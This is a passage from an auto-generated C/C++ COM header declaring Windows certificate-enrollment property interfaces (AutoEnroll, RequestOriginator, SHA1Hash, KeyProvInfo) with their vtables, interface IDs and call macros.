    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyDescription_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyDescription_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyDescription_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyDescription_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyDescription_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyDescription_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyDescription_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyDescription_Initialize(This,strDescription)	\
    ( (This)->lpVtbl -> Initialize(This,strDescription) ) 

#define ICertPropertyDescription_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyDescription_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyAutoEnroll_INTERFACE_DEFINED__
#define __ICertPropertyAutoEnroll_INTERFACE_DEFINED__

/* interface ICertPropertyAutoEnroll */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyAutoEnroll;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab332-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyAutoEnroll : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyAutoEnrollVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyAutoEnroll * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyAutoEnroll * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyAutoEnroll * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateName )( 
            __RPC__in ICertPropertyAutoEnroll * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyAutoEnrollVtbl;

    interface ICertPropertyAutoEnroll
    {
        CONST_VTBL struct ICertPropertyAutoEnrollVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyAutoEnroll_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyAutoEnroll_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyAutoEnroll_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyAutoEnroll_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyAutoEnroll_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyAutoEnroll_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyAutoEnroll_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyAutoEnroll_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyAutoEnroll_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyAutoEnroll_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyAutoEnroll_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyAutoEnroll_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyAutoEnroll_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyAutoEnroll_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyAutoEnroll_Initialize(This,strTemplateName)	\
    ( (This)->lpVtbl -> Initialize(This,strTemplateName) ) 

#define ICertPropertyAutoEnroll_get_TemplateName(This,pValue)	\
    ( (This)->lpVtbl -> get_TemplateName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyAutoEnroll_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyRequestOriginator_INTERFACE_DEFINED__
#define __ICertPropertyRequestOriginator_INTERFACE_DEFINED__

/* interface ICertPropertyRequestOriginator */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyRequestOriginator;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab333-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyRequestOriginator : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strRequestOriginator) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromLocalRequestOriginator( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestOriginator( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyRequestOriginatorVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyRequestOriginator * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [in] */ __RPC__in BSTR strRequestOriginator);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromLocalRequestOriginator )( 
            __RPC__in ICertPropertyRequestOriginator * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestOriginator )( 
            __RPC__in ICertPropertyRequestOriginator * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyRequestOriginatorVtbl;

    interface ICertPropertyRequestOriginator
    {
        CONST_VTBL struct ICertPropertyRequestOriginatorVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyRequestOriginator_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyRequestOriginator_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyRequestOriginator_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyRequestOriginator_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyRequestOriginator_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyRequestOriginator_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyRequestOriginator_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyRequestOriginator_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRequestOriginator_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyRequestOriginator_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyRequestOriginator_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyRequestOriginator_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyRequestOriginator_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRequestOriginator_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyRequestOriginator_Initialize(This,strRequestOriginator)	\
    ( (This)->lpVtbl -> Initialize(This,strRequestOriginator) ) 

#define ICertPropertyRequestOriginator_InitializeFromLocalRequestOriginator(This)	\
    ( (This)->lpVtbl -> InitializeFromLocalRequestOriginator(This) ) 

#define ICertPropertyRequestOriginator_get_RequestOriginator(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestOriginator(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyRequestOriginator_INTERFACE_DEFINED__ */


#ifndef __ICertPropertySHA1Hash_INTERFACE_DEFINED__
#define __ICertPropertySHA1Hash_INTERFACE_DEFINED__

/* interface ICertPropertySHA1Hash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertySHA1Hash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab334-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertySHA1Hash : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SHA1Hash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertySHA1HashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertySHA1Hash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertySHA1Hash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertySHA1Hash * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SHA1Hash )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertySHA1HashVtbl;

    interface ICertPropertySHA1Hash
    {
        CONST_VTBL struct ICertPropertySHA1HashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertySHA1Hash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertySHA1Hash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertySHA1Hash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertySHA1Hash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertySHA1Hash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertySHA1Hash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertySHA1Hash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertySHA1Hash_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertySHA1Hash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertySHA1Hash_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertySHA1Hash_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertySHA1Hash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertySHA1Hash_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertySHA1Hash_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertySHA1Hash_Initialize(This,Encoding,strRenewalValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strRenewalValue) ) 

#define ICertPropertySHA1Hash_get_SHA1Hash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SHA1Hash(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertySHA1Hash_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__
#define __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__

/* interface ICertPropertyKeyProvInfo */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyKeyProvInfo;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab336-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyKeyProvInfo : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509PrivateKey *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyKeyProvInfoVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyKeyProvInfo * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyKeyProvInfo * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyKeyProvInfo * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
